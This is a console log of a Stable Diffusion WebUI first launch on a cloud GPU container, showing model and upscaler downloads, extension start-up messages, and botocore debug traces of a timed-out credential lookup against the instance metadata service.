    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    338
    339
    340
    341
    342
    343
    344
    345
    346
    347
    348
    349
    350
    351
    352
    353
    354
    355
    356
    357
    358
    359
    360
    361
    362
    363
    364
    365
    366
    367
    368
    369
    370
    371
    372
    373
    374
    375
    发现你是第一次运行, 正在初始化镜像依赖
    mkdir: cannot create directory ‘/root/.cache’: File exists
    移动完成
    正在自动下载模型:
    正在下载第1个文件, 总共有1个文件
    >>> download to /root/autodl-tmp/models/checkpoint/xiaolxl/stable-diffusion-models/Anything-ink.safetensors
    downloading file [stable-diffusion-models/Anything-ink.safetensors]
    downloading... 100% 2.0 GiB/2.0 GiBiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/checkpoint/Anything-ink.safetensors
    模型下载完成
    正在自动下载vae:
    正在下载第1个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/model.vae.pt
    downloading file [stable-diffusion-vaes/model.vae.pt]
    downloading... 100% 785 MiB/785 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/model.vae.pt
    正在下载第2个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/sdxl_vae.safetensors
    downloading file [stable-diffusion-vaes/sdxl_vae.safetensors]
    downloading... 100% 319 MiB/319 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/sdxl_vae.safetensors
    正在下载第3个文件, 总共有3个文件
    >>> download to /root/autodl-tmp/models/vae/xiaolxl/stable-diffusion-vaes/vae-ft-mse-840000-ema-pruned.safetensors
    downloading file [stable-diffusion-vaes/vae-ft-mse-840000-ema-pruned.safetensors]
    downloading... 100% 319 MiB/319 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/vae/vae-ft-mse-840000-ema-pruned.safetensors
    vae下载完成
    正在自动下载核心依赖:
    正在下载第1个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/ESRGAN/xiaolxl/sdwebui_core/ESRGAN_4x.pth
    downloading file [sdwebui_core/ESRGAN_4x.pth]
    downloading... 100% 64 MiB/64 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/ESRGAN/ESRGAN_4x.pth
    正在下载第2个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/detection_Resnet50_Final.pth
    downloading file [sdwebui_core/detection_Resnet50_Final.pth]
    downloading... 100% 104 MiB/104 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/detection_Resnet50_Final.pth
    正在下载第3个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/parsing_bisenet.pth
    downloading file [sdwebui_core/parsing_bisenet.pth]
    downloading... 100% 51 MiB/51 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/parsing_bisenet.pth
    正在下载第4个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/GFPGAN/xiaolxl/sdwebui_core/parsing_parsenet.pth
    downloading file [sdwebui_core/parsing_parsenet.pth]
    downloading... 100% 81 MiB/81 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/GFPGAN/parsing_parsenet.pth
    正在下载第5个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/LDSR/xiaolxl/sdwebui_core/model.ckpt
    downloading file [sdwebui_core/model.ckpt]
    downloading... 100% 1.9 GiB/1.9 GiBiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/LDSR/model.ckpt
    正在下载第6个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/LDSR/xiaolxl/sdwebui_core/project.yaml
    downloading file [sdwebui_core/project.yaml]
    downloading... 100% 1.9 KiB/1.9 KiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/LDSR/project.yaml
    正在下载第7个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/RealESRGAN/xiaolxl/sdwebui_core/RealESRGAN_x4plus.pth
    downloading file [sdwebui_core/RealESRGAN_x4plus.pth]
    downloading... 100% 64 MiB/64 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/RealESRGAN/RealESRGAN_x4plus.pth
    正在下载第8个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/RealESRGAN/xiaolxl/sdwebui_core/RealESRGAN_x4plus_anime_6B.pth
    downloading file [sdwebui_core/RealESRGAN_x4plus_anime_6B.pth]
    downloading... 100% 17 MiB/17 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/RealESRGAN/RealESRGAN_x4plus_anime_6B.pth
    正在下载第9个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/ScuNET/xiaolxl/sdwebui_core/ScuNET.pth
    downloading file [sdwebui_core/ScuNET.pth]
    downloading... 100% 69 MiB/69 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/ScuNET/ScuNET.pth
    正在下载第10个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/SwinIR/xiaolxl/sdwebui_core/SwinIR_4x.pth
    downloading file [sdwebui_core/SwinIR_4x.pth]
    downloading... 100% 136 MiB/136 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/SwinIR/SwinIR_4x.pth
    正在下载第11个文件, 总共有11个文件
    >>> download to /root/autodl-tmp/models/Codeformer/xiaolxl/sdwebui_core/codeformer-v0.1.0.pth
    downloading file [sdwebui_core/codeformer-v0.1.0.pth]
    downloading... 100% 359 MiB/359 MiB
    下载完毕!文件已保存到:/root/autodl-tmp/models/Codeformer/codeformer-v0.1.0.pth
    核心依赖下载完成
    Python 3.10.6 (main, Oct 24 2022, 16:07:47) [GCC 11.2.0]
    Version: v1.10.1
    Commit hash: 82a973c04367123ae98bd9abdf80d9eda9b910e2
    Launching Web UI with arguments: --ckpt-dir /root/autodl-tmp/models/checkpoint --embeddings-dir /root/autodl-tmp/models/embeddings --hypernetwork-dir /root/autodl-tmp/models/hypernetwork --lora-dir /root/autodl-tmp/models/lora --vae-dir /root/autodl-tmp/models/vae --controlnet-dir /root/autodl-tmp/models/controlnet --controlnet-annotator-models-path /root/autodl-tmp/models/controlnet_annotator --dreambooth-models-path=/root/autodl-tmp/models/dreambooth --codeformer-models-path /root/autodl-tmp/models/Codeformer --gfpgan-models-path /root/autodl-tmp/models/GFPGAN --esrgan-models-path /root/autodl-tmp/models/ESRGAN --bsrgan-models-path /root/autodl-tmp/models/BSRGAN --realesrgan-models-path /root/autodl-tmp/models/RealESRGAN --scunet-models-path /root/autodl-tmp/models/ScuNET --swinir-models-path /root/autodl-tmp/models/SwinIR --ldsr-models-path /root/autodl-tmp/models/LDSR --port=6006 --skip-install --xformers --disable-safe-unpickle --enable-insecure-extension-access --no-half-vae --disable-nan-check --max-batch-count=16
    2024-11-22 10:09:33.031050: I tensorflow/core/util/port.cc:113] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.
    2024-11-22 10:09:33.031761: I external/local_tsl/tsl/cuda/cudart_stub.cc:32] Could not find cuda drivers on your machine, GPU will not be used.
    2024-11-22 10:09:33.036407: I external/local_tsl/tsl/cuda/cudart_stub.cc:32] Could not find cuda drivers on your machine, GPU will not be used.
    2024-11-22 10:09:33.096722: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
    To enable the following instructions: AVX2 AVX512F AVX512_VNNI FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
    2024-11-22 10:09:34.162360: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Could not find TensorRT
    [2024-11-22 10:09:37,570][DEBUG][git.cmd] - Popen(['git', 'version'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    [2024-11-22 10:09:37,573][DEBUG][git.cmd] - Popen(['git', 'version'], cwd=/root/stable-diffusion-webui, stdin=None, shell=False, universal_newlines=False)
    ==============================================================================
    You are running torch 2.0.1+cu118.
    The program is tested to work with torch 2.1.2.
    To reinstall the desired version, run with commandline flag --reinstall-torch.
    Beware that this will cause a lot of large files to be downloaded, as well as
    there are reports of issues with training tab on the latest version.

    Use --skip-version-check commandline argument to disable this check.
    ==============================================================================
    =================================================================================
    You are running xformers 0.0.22.
    The program is tested to work with xformers 0.0.23.post1.
    To reinstall the desired version, run with commandline flag --reinstall-xformers.

    Use --skip-version-check commandline argument to disable this check.
    =================================================================================
    Tag Autocomplete: Could not locate model-keyword extension, Lora trigger word completion will be limited to those added through the extra networks menu.
    [2024-11-22 10:09:39,928][DEBUG][filelock] - Attempting to acquire lock 140561340305072 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:39,928][DEBUG][filelock] - Lock 140561340305072 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:39,934][DEBUG][filelock] - Attempting to acquire lock 140561340307616 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:39,934][DEBUG][filelock] - Lock 140561340307616 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:39,978][DEBUG][filelock] - Attempting to acquire lock 140561342047728 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:39,978][DEBUG][filelock] - Lock 140561342047728 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:39,989][DEBUG][filelock] - Attempting to acquire lock 140561340302624 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:39,989][DEBUG][filelock] - Lock 140561340302624 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:39,995][DEBUG][filelock] - Attempting to acquire lock 140561340312128 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    [2024-11-22 10:09:39,995][DEBUG][filelock] - Lock 140561340312128 acquired on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    hand_yolov8n.pt: 0%| | 0.00/6.24M [00:00<?, ?B/s]
    person_yolov8n-seg.pt: 0%| | 0.00/6.78M [00:00<?, ?B/s]

    person_yolov8s-seg.pt: 0%| | 0.00/23.9M [00:00<?, ?B/s]


    face_yolov8n.pt: 0%| | 0.00/6.23M [00:00<?, ?B/s]



    hand_yolov8n.pt: 100%|█████████████████████| 6.24M/6.24M [00:01<00:00, 6.23MB/s]
    [2024-11-22 10:09:41,420][DEBUG][filelock] - Attempting to release lock 140561340305072 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock
    [2024-11-22 10:09:41,420][DEBUG][filelock] - Lock 140561340305072 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/3991202eb69e9ddcb3b9ba80cdeb41e734ffaf844403d6c9f47d515cd88c6f29.lock

    person_yolov8n-seg.pt: 100%|███████████████| 6.78M/6.78M [00:01<00:00, 5.19MB/s]
    [2024-11-22 10:09:41,779][DEBUG][filelock] - Attempting to release lock 140561340307616 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock
    [2024-11-22 10:09:41,780][DEBUG][filelock] - Lock 140561340307616 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/38fc8aaae97cb6e70be4ec44770005b26ed473471362afcda62a0037d7ccf432.lock



    face_yolov8n.pt: 100%|█████████████████████| 6.23M/6.23M [00:01<00:00, 4.71MB/s]
    [2024-11-22 10:09:41,860][DEBUG][filelock] - Attempting to release lock 140561342047728 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock
    [2024-11-22 10:09:41,860][DEBUG][filelock] - Lock 140561342047728 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/70b640f8f60b1cf0dcc72f30caf3da9495eb2fb6509da48c53374ad6806e6a9c.lock


    person_yolov8s-seg.pt: 44%|██████▌ | 10.5M/23.9M [00:01<00:01, 7.20MB/s]



    face_yolov8s.pt: 47%|█████████▊ | 10.5M/22.5M [00:01<00:02, 5.43MB/s]

    person_yolov8s-seg.pt: 88%|█████████████▏ | 21.0M/23.9M [00:02<00:00, 8.41MB/s]

    person_yolov8s-seg.pt: 100%|███████████████| 23.9M/23.9M [00:02<00:00, 8.63MB/s]
    [2024-11-22 10:09:43,256][DEBUG][filelock] - Attempting to release lock 140561340312128 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock
    [2024-11-22 10:09:43,256][DEBUG][filelock] - Lock 140561340312128 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/53c54aec2239355faffc6c5b70d0f3d05042f386f956cbec39cec46ad456f050.lock




    face_yolov8s.pt: 93%|███████████████████▌ | 21.0M/22.5M [00:02<00:00, 7.86MB/s]



    face_yolov8s.pt: 100%|█████████████████████| 22.5M/22.5M [00:02<00:00, 7.52MB/s]
    [2024-11-22 10:09:43,628][DEBUG][filelock] - Attempting to release lock 140561340302624 on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [2024-11-22 10:09:43,628][DEBUG][filelock] - Lock 140561340302624 released on /root/.cache/huggingface/hub/.locks/models--Bingsu--adetailer/c7237eff25787377de196961140ceaed324d859ee8de5a775d93d33a0e3fab78.lock
    [-] ADetailer initialized. version: 24.9.0, num models: 10
    Using sqlite file: /root/stable-diffusion-webui/extensions/sd-webui-agent-scheduler/task_scheduler.sqlite3
    ControlNet preprocessor location: /root/autodl-tmp/models/controlnet_annotator
    2024-11-22 10:09:46,370 - ControlNet - INFO - ControlNet v1.1.455
    Please 'pip install apex'
    [sd-webui-freeu] Controlnet support: *enabled*
    sd-webui-prompt-all-in-one background API service started successfully.
    2024-11-22 10:09:47,532 - roop - INFO - roop v0.0.2
    2024-11-22 10:09:47,627 - roop - INFO - roop v0.0.2
    [2024-11-22 10:09:48,591][DEBUG][api.py] - API flag not enabled, skipping API layer. Please enable with --api
    == WD14 tagger /gpu:0, uname_result(system='Linux', node='autodl-container-2cce11be52-d05bc5cf', release='5.4.0-182-generic', version='#202-Ubuntu SMP Fri Apr 26 12:29:36 UTC 2024', machine='x86_64') ==
    Checkpoint Anything-ink.safetensors [a1535d0a42] not found; loading fallback Anything-ink.safetensors
    Calculating sha256 for /root/stable-diffusion-webui/models/Stable-diffusion/Anything-ink.safetensors: 2024-11-22 10:09:50,529 - ControlNet - INFO - ControlNet UI callback registered.
    LightDiffusionFlow 绑定完成
    *Deforum ControlNet support: enabled*
    [tag-editor] Custom taggers loaded: ['Improved Aesthetic Predictor', 'cafeai aesthetic classifier', 'aesthetic shadow', 'wd aesthetic classifier']
    Running on local URL: http://127.0.0.1:6006
    [2024-11-22 10:09:53,176][DEBUG][botocore.hooks] - Changing event name from creating-client-class.iot-data to creating-client-class.iot-data-plane
    [2024-11-22 10:09:53,178][DEBUG][botocore.hooks] - Changing event name from before-call.apigateway to before-call.api-gateway
    [2024-11-22 10:09:53,178][DEBUG][botocore.hooks] - Changing event name from request-created.machinelearning.Predict to request-created.machine-learning.Predict
    [2024-11-22 10:09:53,179][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.autoscaling.CreateLaunchConfiguration to before-parameter-build.auto-scaling.CreateLaunchConfiguration
    [2024-11-22 10:09:53,180][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.route53 to before-parameter-build.route-53
    [2024-11-22 10:09:53,180][DEBUG][botocore.hooks] - Changing event name from request-created.cloudsearchdomain.Search to request-created.cloudsearch-domain.Search
    [2024-11-22 10:09:53,181][DEBUG][botocore.hooks] - Changing event name from docs.*.autoscaling.CreateLaunchConfiguration.complete-section to docs.*.auto-scaling.CreateLaunchConfiguration.complete-section
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.logs.CreateExportTask to before-parameter-build.cloudwatch-logs.CreateExportTask
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from docs.*.logs.CreateExportTask.complete-section to docs.*.cloudwatch-logs.CreateExportTask.complete-section
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from before-parameter-build.cloudsearchdomain.Search to before-parameter-build.cloudsearch-domain.Search
    [2024-11-22 10:09:53,183][DEBUG][botocore.hooks] - Changing event name from docs.*.cloudsearchdomain.Search.complete-section to docs.*.cloudsearch-domain.Search.complete-section
    [2024-11-22 10:09:53,185][DEBUG][botocore.utils] - IMDS ENDPOINT: http://169.254.169.254/
    [2024-11-22 10:09:53,186][DEBUG][botocore.credentials] - Looking for credentials via: env
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: assume-role
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: assume-role-with-web-identity
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: sso
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: shared-credentials-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: custom-process
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: config-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: ec2-credentials-file
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: boto-config
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: container-role
    [2024-11-22 10:09:53,188][DEBUG][botocore.credentials] - Looking for credentials via: iam-role
    [2024-11-22 10:09:54,190][DEBUG][botocore.utils] - Caught retryable HTTP exception while making metadata service request to http://169.254.169.254/latest/api/token: Connect timeout on endpoint URL: "http://169.254.169.254/latest/api/token"
    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
    conn = connection.create_connection(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 95, in create_connection
    raise err
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 85, in create_connection
    sock.connect(sa)
    TimeoutError: timed out

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 465, in send
    urllib_response = conn.urlopen(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 787, in urlopen
    retries = retries.increment(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/retry.py", line 525, in increment
    raise six.reraise(type(error), error, _stacktrace)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/packages/six.py", line 770, in reraise
    raise value
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 703, in urlopen
    httplib_response = self._make_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 398, in _make_request
    conn.request(method, url, **httplib_request_kw)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 239, in request
    super(HTTPConnection, self).request(method, url, body=body, headers=headers)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1282, in request
    self._send_request(method, url, body, headers, encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 94, in _send_request
    rval = super()._send_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1328, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1277, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 123, in _send_output
    self.send(msg)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 218, in send
    return super().send(str)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 975, in send
    self.connect()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 205, in connect
    conn = self._new_conn()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
    raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<botocore.awsrequest.AWSHTTPConnection object at 0x7fd6b31d9a80>, 'Connection to 169.254.169.254 timed out. (connect timeout=1)')

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/utils.py", line 456, in _fetch_metadata_token
    response = self._session.send(request.prepare())
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 500, in send
    raise ConnectTimeoutError(endpoint_url=request.url, error=e)
    botocore.exceptions.ConnectTimeoutError: Connect timeout on endpoint URL: "http://169.254.169.254/latest/api/token"
    [2024-11-22 10:09:55,193][DEBUG][botocore.utils] - Caught retryable HTTP exception while making metadata service request to http://169.254.169.254/latest/meta-data/iam/security-credentials/: Connect timeout on endpoint URL: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 174, in _new_conn
    conn = connection.create_connection(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 95, in create_connection
    raise err
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/connection.py", line 85, in create_connection
    sock.connect(sa)
    TimeoutError: timed out

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 465, in send
    urllib_response = conn.urlopen(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 787, in urlopen
    retries = retries.increment(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/util/retry.py", line 525, in increment
    raise six.reraise(type(error), error, _stacktrace)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/packages/six.py", line 770, in reraise
    raise value
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 703, in urlopen
    httplib_response = self._make_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connectionpool.py", line 398, in _make_request
    conn.request(method, url, **httplib_request_kw)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 239, in request
    super(HTTPConnection, self).request(method, url, body=body, headers=headers)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1282, in request
    self._send_request(method, url, body, headers, encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 94, in _send_request
    rval = super()._send_request(
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1328, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 1277, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 123, in _send_output
    self.send(msg)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/awsrequest.py", line 218, in send
    return super().send(str)
    File "/root/miniconda3/envs/xl_env/lib/python3.10/http/client.py", line 975, in send
    self.connect()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 205, in connect
    conn = self._new_conn()
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/urllib3/connection.py", line 179, in _new_conn
    raise ConnectTimeoutError(
    urllib3.exceptions.ConnectTimeoutError: (<botocore.awsrequest.AWSHTTPConnection object at 0x7fd6b31d9f90>, 'Connection to 169.254.169.254 timed out. (connect timeout=1)')

    During handling of the above exception, another exception occurred:

    Traceback (most recent call last):
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/utils.py", line 509, in _get_request
    response = self._session.send(request.prepare())
    File "/root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/httpsession.py", line 500, in send
    raise ConnectTimeoutError(endpoint_url=request.url, error=e)
    botocore.exceptions.ConnectTimeoutError: Connect timeout on endpoint URL: "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
    [2024-11-22 10:09:55,194][DEBUG][botocore.utils] - Max number of attempts exceeded (1) when attempting to retrieve data from metadata service.
    [2024-11-22 10:09:55,195][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/endpoints.json
    [2024-11-22 10:09:55,206][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sdk-default-configuration.json
    [2024-11-22 10:09:55,206][DEBUG][botocore.hooks] - Event choose-service-name: calling handler <function handle_service_name_alias at 0x7fd7d6e0ea70>
    [2024-11-22 10:09:55,218][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sts/2011-06-15/service-2.json
    [2024-11-22 10:09:55,231][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/sts/2011-06-15/endpoint-rule-set-1.json.gz
    [2024-11-22 10:09:55,231][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/partitions.json
    [2024-11-22 10:09:55,232][DEBUG][botocore.hooks] - Event creating-client-class.sts: calling handler <function add_generate_presigned_url at 0x7fd7e4155cf0>
    [2024-11-22 10:09:55,234][DEBUG][botocore.endpoint] - Setting sts timeout as (60, 60)
    [2024-11-22 10:09:55,235][DEBUG][botocore.loaders] - Loading JSON file: /root/miniconda3/envs/xl_env/lib/python3.10/site-packages/botocore/data/_retry.json
    [2024-11-22 10:09:55,235][DEBUG][botocore.client] - Registering retry handlers for service: sts
    [2024-11-22 10:09:55,236][DEBUG][botocore.hooks] - Event before-parameter-build.sts.GetCallerIdentity: calling handler <function generate_idempotent_uuid at 0x7fd7d6e2c0d0>
    [2024-11-22 10:09:55,236][DEBUG][botocore.regions] - Calling endpoint provider with parameters: {'Region': 'aws-global', 'UseDualStack': False, 'UseFIPS': False, 'UseGlobalEndpoint': True}
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Endpoint provider result: https://sts.amazonaws.com
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Selecting from endpoint provider's list of auth schemes: "sigv4". User selected auth scheme is: "None"
    [2024-11-22 10:09:55,238][DEBUG][botocore.regions] - Selected auth type "v4" as "v4" with signing context params: {'region': 'us-east-1', 'signing_name': 'sts'}
    [2024-11-22 10:09:55,238][DEBUG][botocore.hooks] - Event before-call.sts.GetCallerIdentity: calling handler <function add_recursion_detection_header at 0x7fd7d6e0fd00>
    [2024-11-22 10:09:55,238][DEBUG][botocore.hooks] - Event before-call.sts.GetCallerIdentity: calling handler <function inject_api_version_header_if_needed at 0x7fd7d6e2d900>
